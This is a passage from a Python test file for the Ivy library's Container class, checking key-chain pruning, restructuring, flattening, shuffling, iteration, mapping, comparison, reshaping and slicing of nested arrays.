)
# absolute
container_pruned = container.prune_keys_from_key_chains(["Bee", "Eee"])
assert np.allclose(ivy.to_numpy(container_pruned["Ayy"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["Cee"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned["Dee"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned["Fff"]), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Fff), np.array([[4]]))
assert "Bee" not in container_pruned
assert "Eee" not in container_pruned
# containing
container_pruned = container.prune_keys_from_key_chains(containing=["B", "E"])
assert np.allclose(ivy.to_numpy(container_pruned["Ayy"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["Cee"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned["Dee"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned["Fff"]), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Fff), np.array([[4]]))
assert "Bee" not in container_pruned
assert "Eee" not in container_pruned
def test_container_restructure_key_chains(device, call):
# single
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_restructured = container.restructure_key_chains({"a": "A"})
assert np.allclose(ivy.to_numpy(container_restructured["A"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured.A), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured["b/c"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured["b/d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_restructured.b.d), np.array([[3]]))
# full
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_restructured = container.restructure_key_chains(
{"a": "A", "b/c": "B/C", "b/d": "B/D"}
)
assert np.allclose(ivy.to_numpy(container_restructured["A"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured.A), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured["B/C"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured.B.C), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured["B/D"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_restructured.B.D), np.array([[3]]))
def test_container_restructure(device, call):
container = Container(
{
"a": ivy.array([[1, 2], [3, 4]], device=device),
"b": {
"c": ivy.array([[2, 4], [6, 8]], device=device),
"d": ivy.array([3, 6, 9, 12], device=device),
},
}
)
container_restructured = container.restructure(
{
"a": {"key_chain": "A", "pattern": "a b -> b a"},
"b/c": {"key_chain": "B/C", "pattern": "a b -> (a b)"},
"b/d": {
"key_chain": "B/D",
"pattern": "(a b) -> a b",
"axes_lengths": {"a": 2, "b": 2},
},
},
keep_orig=False,
)
assert np.allclose(
ivy.to_numpy(container_restructured["A"]), np.array([[1, 3], [2, 4]])
)
assert np.allclose(
ivy.to_numpy(container_restructured.A), np.array([[1, 3], [2, 4]])
)
assert np.allclose(
ivy.to_numpy(container_restructured["B/C"]), np.array([2, 4, 6, 8])
)
assert np.allclose(ivy.to_numpy(container_restructured.B.C), np.array([2, 4, 6, 8]))
assert np.allclose(
ivy.to_numpy(container_restructured["B/D"]), np.array([[3, 6], [9, 12]])
)
assert np.allclose(
ivy.to_numpy(container_restructured.B.D), np.array([[3, 6], [9, 12]])
)
def test_container_flatten_key_chains(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": {"d": ivy.array([2], device=device)},
"e": {"f": {"g": ivy.array([3], device=device)}},
},
}
)
# full
container_flat = container.flatten_key_chains()
assert np.allclose(ivy.to_numpy(container_flat["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat["b__c__d"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b__c__d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat["b__e__f__g"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b__e__f__g), np.array([[3]]))
# above height 1
container_flat = container.flatten_key_chains(above_height=1)
assert np.allclose(ivy.to_numpy(container_flat["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat["b__c"]["d"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b__c.d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat["b__e__f"]["g"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b__e__f.g), np.array([[3]]))
# below depth 1
container_flat = container.flatten_key_chains(below_depth=1)
assert np.allclose(ivy.to_numpy(container_flat["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat["b"]["c__d"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b.c__d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat["b"]["e__f__g"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b.e__f__g), np.array([[3]]))
# above height 1, below depth 1
container_flat = container.flatten_key_chains(above_height=1, below_depth=1)
assert np.allclose(ivy.to_numpy(container_flat["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat["b"]["c"]["d"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b.c.d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat["b"]["e__f"]["g"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b.e__f.g), np.array([[3]]))
def test_container_deep_copy(device, call):
dict_in = {
"a": ivy.array([0.0], device=device),
"b": {
"c": ivy.array([1.0], device=device),
"d": ivy.array([2.0], device=device),
},
}
cont = Container(dict_in)
cont_deepcopy = cont.deep_copy()
assert np.allclose(ivy.to_numpy(cont.a), ivy.to_numpy(cont_deepcopy.a))
assert np.allclose(ivy.to_numpy(cont.b.c), ivy.to_numpy(cont_deepcopy.b.c))
assert np.allclose(ivy.to_numpy(cont.b.d), ivy.to_numpy(cont_deepcopy.b.d))
assert id(cont.a) != id(cont_deepcopy.a)
assert id(cont.b.c) != id(cont_deepcopy.b.c)
assert id(cont.b.d) != id(cont_deepcopy.b.d)
def test_container_contains(device, call):
arr0 = ivy.array([0.0], device=device)
arr1 = ivy.array([1.0], device=device)
arr2 = ivy.array([2.0], device=device)
sub_cont = Container({"c": arr1, "d": arr2})
container = Container({"a": arr0, "b": sub_cont})
# keys
assert "a" in container
assert "b" in container
assert "c" not in container
assert "b/c" in container
assert "d" not in container
assert "b/d" in container
# sub-container
assert container.contains_sub_container(container)
assert container.contains_sub_container(sub_cont)
assert sub_cont in container
# partial sub-container
partial_sub_cont = Container({"b": {"d": arr2}})
assert container.contains_sub_container(container, partial=True)
assert container.contains_sub_container(partial_sub_cont, partial=True)
assert not partial_sub_cont.contains_sub_container(container, partial=True)
# sub-structure
sub_struc = Container(
{"c": ivy.array([3.0], device=device), "d": ivy.array([4.0], device=device)}
)
assert not container.contains_sub_container(sub_struc)
assert sub_struc not in container
assert container.contains_sub_structure(sub_struc)
assert container.contains_sub_structure(container)
# partial sub-structure
partial_sub_struc = Container({"b": {"d": ivy.array([4.0], device=device)}})
assert container.contains_sub_structure(container, partial=True)
assert container.contains_sub_structure(partial_sub_struc, partial=True)
assert not partial_sub_struc.contains_sub_structure(container, partial=True)
def test_container_shuffle(device, call):
if call is helpers.tf_graph_call:
# tf.random.set_seed is not compiled. The shuffle is then not
# aligned between container items.
pytest.skip()
dict_in = {
"a": ivy.array([1, 2, 3], device=device),
"b": {
"c": ivy.array([1, 2, 3], device=device),
"d": ivy.array([1, 2, 3], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_shuffled = container.shuffle(0)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["d"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.d) == shuffled_data).all()
# with key_chains to apply
container_shuffled = container.shuffle(0, ["a", "b/c"])
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["d"]) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.b.d) == ivy.to_numpy(data)).all()
# with key_chains to apply pruned
container_shuffled = container.shuffle(0, ["a", "b/c"], prune_unapplied=True)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert "b/d" not in container_shuffled
# with key_chains to not apply pruned
container_shuffled = container.shuffle(
0, Container({"a": None, "b": {"d": None}}), to_apply=False
)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.a) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["d"]) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.b.d) == ivy.to_numpy(data)).all()
# with key_chains to not apply pruned
container_shuffled = container.shuffle(
0,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert "a" not in container_shuffled
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert "b/d" not in container_shuffled
# map sequences
dict_in = {
"a": ivy.array([1, 2, 3], device=device),
"b": [ivy.array([1, 2, 3], device=device), ivy.array([1, 2, 3], device=device)],
}
container = Container(dict_in)
container_shuffled = container.shuffle(0, map_sequences=True)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"][0]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b[0]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"][1]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b[1]) == shuffled_data).all()
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_to_iterator(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a": a_val, "b": {"c": bc_val, "d": bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator(include_empty=include_empty)
for (key_chain, value), expected in zip(
container_iterator, [("a", a_val), ("b/c", bc_val), ("b/d", bd_val)]
):
expected_key_chain = expected[0]
expected_value = expected[1]
assert key_chain == expected_key_chain
assert value is expected_value
# with leaf keys
container_iterator = container.to_iterator(
leaf_keys_only=True, include_empty=include_empty
)
for (key_chain, value), expected in zip(
container_iterator, [("a", a_val), ("c", bc_val), ("d", bd_val)]
):
expected_key_chain = expected[0]
expected_value = expected[1]
assert key_chain == expected_key_chain
assert value is expected_value
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_to_iterator_values(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a": a_val, "b": {"c": bc_val, "d": bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator_values(include_empty=include_empty)
for value, expected_value in zip(container_iterator, [a_val, bc_val, bd_val]):
assert value is expected_value
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_to_iterator_keys(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a": a_val, "b": {"c": bc_val, "d": bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator_keys(include_empty=include_empty)
for key_chain, expected_key_chain in zip(container_iterator, ["a", "b/c", "b/d"]):
assert key_chain == expected_key_chain
# with leaf keys
container_iterator = container.to_iterator_keys(
leaf_keys_only=True, include_empty=include_empty
)
for key, expected_key in zip(container_iterator, ["a", "c", "d"]):
assert key == expected_key
def test_container_to_flat_list(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_flat_list = container.to_flat_list()
for value, expected_value in zip(
container_flat_list,
[
ivy.array([1], device=device),
ivy.array([2], device=device),
ivy.array([3], device=device),
],
):
assert value == expected_value
def test_container_from_flat_list(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
flat_list = [4, 5, 6]
container = container.from_flat_list(flat_list)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
@pytest.mark.parametrize("inplace", [True, False])
def test_container_map(inplace, device, call):
# without key_chains specification
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container_orig = Container(dict_in)
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, inplace=inplace)
if inplace:
container_iterator = container.to_iterator()
else:
container_iterator = container_mapped.to_iterator()
for (key, value), expected_value in zip(
container_iterator,
[
ivy.array([2], device=device),
ivy.array([3], device=device),
ivy.array([4], device=device),
],
):
assert call(lambda x: x, value) == call(lambda x: x, expected_value)
# with key_chains to apply
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, ["a", "b/c"], inplace=inplace)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[3]]))
# with key_chains to apply pruned
container = container_orig.deep_copy()
container_mapped = container.map(
lambda x, _: x + 1, ["a", "b/c"], prune_unapplied=True, inplace=inplace
)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
if not inplace:
assert "b/d" not in container_mapped
# with key_chains to not apply
container = container_orig.deep_copy()
container_mapped = container.map(
lambda x, _: x + 1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
inplace=inplace,
)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[3]]))
# with key_chains to not apply pruned
container = container_orig.deep_copy()
container_mapped = container.map(
lambda x, _: x + 1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
inplace=inplace,
)
if inplace:
container_mapped = container
if not inplace:
assert "a" not in container_mapped
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
if not inplace:
assert "b/d" not in container_mapped
# with sequences
container_orig = Container(
{
"a": ivy.array([1], device=device),
"b": [ivy.array([2], device=device), ivy.array([3], device=device)],
}
)
container = container_orig.deep_copy()
container_mapped = container.map(
lambda x, _: x + 1, inplace=inplace, map_sequences=True
)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_mapped["b"][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_mapped["b"][1]), np.array([4]))
@pytest.mark.parametrize("inplace", [True, False])
def test_container_map_conts(inplace, device, call):
# without key_chains specification
container_orig = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
def _add_e_attr(cont_in):
cont_in.e = ivy.array([4], device=device)
return cont_in
# with self
container = container_orig.deep_copy()
container_mapped = container.map_conts(lambda c, _: _add_e_attr(c), inplace=inplace)
if inplace:
container_mapped = container
assert "e" in container_mapped
assert np.array_equal(ivy.to_numpy(container_mapped.e), np.array([4]))
assert "e" in container_mapped.b
assert np.array_equal(ivy.to_numpy(container_mapped.b.e), np.array([4]))
# without self
container = container_orig.deep_copy()
container_mapped = container.map_conts(
lambda c, _: _add_e_attr(c), include_self=False, inplace=inplace
)
if inplace:
container_mapped = container
assert "e" not in container_mapped
assert "e" in container_mapped.b
assert np.array_equal(ivy.to_numpy(container_mapped.b.e), np.array([4]))
def test_container_multi_map(device, call):
# without key_chains specification
container0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container1 = Container(
{
"a": ivy.array([3], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([5], device=device),
},
}
)
# with key_chains to apply
container_mapped = ivy.Container.multi_map(
lambda x, _: x[0] + x[1], [container0, container1]
)
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[6]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[6]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["d"]), np.array([[8]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[8]]))
def test_container_common_key_chains(device, call):
arr1 = ivy.array([1], device=device)
arr2 = ivy.array([2], device=device)
arr3 = ivy.array([3], device=device)
cont0 = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
cont1 = Container({"b": {"c": arr2, "d": arr3, "e": arr1}})
cont2 = Container({"a": arr1, "b": {"d": arr3, "e": arr1}})
# 0
common_kcs = Container.common_key_chains([cont0])
assert len(common_kcs) == 3
assert "a" in common_kcs
assert "b/c" in common_kcs
assert "b/d" in common_kcs
# 0-1
common_kcs = Container.common_key_chains([cont0, cont1])
assert len(common_kcs) == 2
assert "b/c" in common_kcs
assert "b/d" in common_kcs
# 0-2
common_kcs = Container.common_key_chains([cont0, cont2])
assert len(common_kcs) == 2
assert "a" in common_kcs
assert "b/d" in common_kcs
# 1-2
common_kcs = Container.common_key_chains([cont1, cont2])
assert len(common_kcs) == 2
assert "b/d" in common_kcs
assert "b/e" in common_kcs
# all
common_kcs = Container.common_key_chains([cont0, cont1, cont2])
assert len(common_kcs) == 1
assert "b/d" in common_kcs
def test_container_identical(device, call):
# without key_chains specification
arr1 = ivy.array([1], device=device)
arr2 = ivy.array([2], device=device)
arr3 = ivy.array([3], device=device)
container0 = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
container1 = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
container2 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container3 = Container({"b": {"d": arr3}})
container4 = Container({"d": arr3})
# the same
assert ivy.Container.identical([container0, container1])
assert ivy.Container.identical([container1, container0])
# not the same
assert not ivy.Container.identical([container0, container2])
assert not ivy.Container.identical([container2, container0])
assert not ivy.Container.identical([container1, container2])
assert not ivy.Container.identical([container2, container1])
# partial
assert ivy.Container.identical([container0, container3], partial=True)
assert ivy.Container.identical([container3, container0], partial=True)
assert not ivy.Container.identical([container0, container4], partial=True)
assert not ivy.Container.identical([container4, container0], partial=True)
def test_container_identical_structure(device, call):
# without key_chains specification
container0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container1 = Container(
{
"a": ivy.array([3], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([5], device=device),
},
}
)
container2 = Container(
{
"a": ivy.array([3], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([5], device=device),
"e": ivy.array([6], device=device),
},
}
)
container3 = Container(
{
"a": ivy.array([3], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([5], device=device),
},
"e": ivy.array([6], device=device),
}
)
container4 = Container({"b": {"d": ivy.array([4], device=device)}})
container5 = Container({"d": ivy.array([4], device=device)})
# with identical
assert ivy.Container.identical_structure([container0, container1])
assert ivy.Container.identical_structure([container1, container0])
assert ivy.Container.identical_structure([container1, container0, container1])
# without identical
assert not ivy.Container.identical_structure([container2, container3])
assert not ivy.Container.identical_structure([container0, container3])
assert not ivy.Container.identical_structure([container1, container2])
assert not ivy.Container.identical_structure([container1, container0, container2])
# partial
assert ivy.Container.identical_structure([container0, container4], partial=True)
assert ivy.Container.identical_structure([container1, container4], partial=True)
assert ivy.Container.identical_structure([container2, container4], partial=True)
assert ivy.Container.identical_structure([container3, container4], partial=True)
assert ivy.Container.identical_structure([container4, container4], partial=True)
assert not ivy.Container.identical_structure([container0, container5], partial=True)
assert not ivy.Container.identical_structure([container1, container5], partial=True)
assert not ivy.Container.identical_structure([container2, container5], partial=True)
assert not ivy.Container.identical_structure([container3, container5], partial=True)
assert not ivy.Container.identical_structure([container4, container5], partial=True)
def test_container_identical_configs(device, call):
container0 = Container({"a": ivy.array([1], device=device)}, print_limit=5)
container1 = Container({"a": ivy.array([1], device=device)}, print_limit=5)
container2 = Container({"a": ivy.array([1], device=device)}, print_limit=10)
# with identical
assert ivy.Container.identical_configs([container0, container1])
assert ivy.Container.identical_configs([container1, container0])
assert ivy.Container.identical_configs([container1, container0, container1])
# without identical
assert not ivy.Container.identical_configs([container1, container2])
assert not ivy.Container.identical_configs([container1, container0, container2])
def test_container_identical_array_shapes(device, call):
# without key_chains specification
container0 = Container(
{
"a": ivy.array([1, 2], device=device),
"b": {
"c": ivy.array([2, 3, 4], device=device),
"d": ivy.array([3, 4, 5, 6], device=device),
},
}
)
container1 = Container(
{
"a": ivy.array([1, 2, 3, 4], device=device),
"b": {
"c": ivy.array([3, 4], device=device),
"d": ivy.array([3, 4, 5], device=device),
},
}
)
container2 = Container(
{
"a": ivy.array([1, 2, 3, 4], device=device),
"b": {
"c": ivy.array([3, 4], device=device),
"d": ivy.array([3, 4, 5, 6], device=device),
},
}
)
# with identical
assert ivy.Container.identical_array_shapes([container0, container1])
assert ivy.Container.identical_array_shapes([container1, container0])
assert ivy.Container.identical_array_shapes([container1, container0, container1])
assert not ivy.Container.identical([container0, container2])
assert not ivy.Container.identical([container1, container2])
assert not ivy.Container.identical([container0, container1, container2])
def test_container_dtype(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2.0], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
dtype_container = container.dtype()
for (key, value), expected_value in zip(
dtype_container.to_iterator(),
[
ivy.array([1], device=device).dtype,
ivy.array([2.0], device=device).dtype,
ivy.array([3], device=device).dtype,
],
):
assert value == expected_value
def test_container_with_entries_as_lists(device, call):
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2.0], device=device), "d": "some string"},
}
container = Container(dict_in)
container_w_list_entries = container.with_entries_as_lists()
for (key, value), expected_value in zip(
container_w_list_entries.to_iterator(), [[1], [2.0], "some string"]
):
assert value == expected_value
def test_container_reshape_like(device, call):
container = Container(
{
"a": ivy.array([[1.0]], device=device),
"b": {
"c": ivy.array([[3.0], [4.0]], device=device),
"d": ivy.array([[5.0], [6.0], [7.0]], device=device),
},
}
)
new_shapes = Container({"a": (1,), "b": {"c": (1, 2, 1), "d": (3, 1, 1)}})
# without leading shape
container_reshaped = container.reshape_like(new_shapes)
assert list(container_reshaped["a"].shape) == [1]
assert list(container_reshaped.a.shape) == [1]
assert list(container_reshaped["b"]["c"].shape) == [1, 2, 1]
assert list(container_reshaped.b.c.shape) == [1, 2, 1]
assert list(container_reshaped["b"]["d"].shape) == [3, 1, 1]
assert list(container_reshaped.b.d.shape) == [3, 1, 1]
# with leading shape
container = Container(
{
"a": ivy.array([[[1.0]], [[1.0]], [[1.0]]], device=device),
"b": {
"c": ivy.array(
[[[3.0], [4.0]], [[3.0], [4.0]], [[3.0], [4.0]]], device=device
),
"d": ivy.array(
[
[[5.0], [6.0], [7.0]],
[[5.0], [6.0], [7.0]],
[[5.0], [6.0], [7.0]],
],
device=device,
),
},
}
)
container_reshaped = container.reshape_like(new_shapes, leading_shape=[3])
assert list(container_reshaped["a"].shape) == [3, 1]
assert list(container_reshaped.a.shape) == [3, 1]
assert list(container_reshaped["b"]["c"].shape) == [3, 1, 2, 1]
assert list(container_reshaped.b.c.shape) == [3, 1, 2, 1]
assert list(container_reshaped["b"]["d"].shape) == [3, 3, 1, 1]
assert list(container_reshaped.b.d.shape) == [3, 3, 1, 1]
def test_container_slice(device, call):
dict_in = {
"a": ivy.array([[0.0], [1.0]], device=device),
"b": {
"c": ivy.array([[1.0], [2.0]], device=device),
"d": ivy.array([[2.0], [3.0]], device=device),
},
}
container = Container(dict_in)
container0 = container[0]
container1 = container[1]
assert np.array_equal(ivy.to_numpy(container0["a"]), np.array([0.0]))
assert np.array_equal(ivy.to_numpy(container0.a), np.array([0.0]))
assert np.array_equal(ivy.to_numpy(container0["b"]["c"]), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(container0.b.c), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(container0["b"]["d"]), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(container0.b.d), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(container1["a"]), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(container1.a), np.array([1.0]))
assert np.array_equal(ivy.to_numpy(container1["b"]["c"]), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(container1.b.c), np.array([2.0]))
assert np.array_equal(ivy.to_numpy(container1["b"]["d"]), np.array([3.0]))
assert np.array_equal(ivy.to_numpy(container1.b.d), np.array([3.0]))
def test_container_slice_via_key(device, call):
dict_in = {
"a": {
"x": ivy.array([0.0], device=device),
"y": ivy.array([1.0], device=device),
},
"b": {
"c": {
"x": ivy.array([1.0], device=device),
"y": ivy.array([2.0], device=device),
},
"d": {
"x": ivy.array([2.0], device=device),
"y": ivy.array([3.0], device=device),
},
},
}
container = Container(dict_in)
containerx = container.slice_via_key("x")
containery = container.slice_via_key("y")
assert np.array_equal(ivy.to_numpy(containerx["a"]), np.array([0.0]))
assert np.array_equal(ivy.to_numpy(containerx.a), np.array([0.0]))
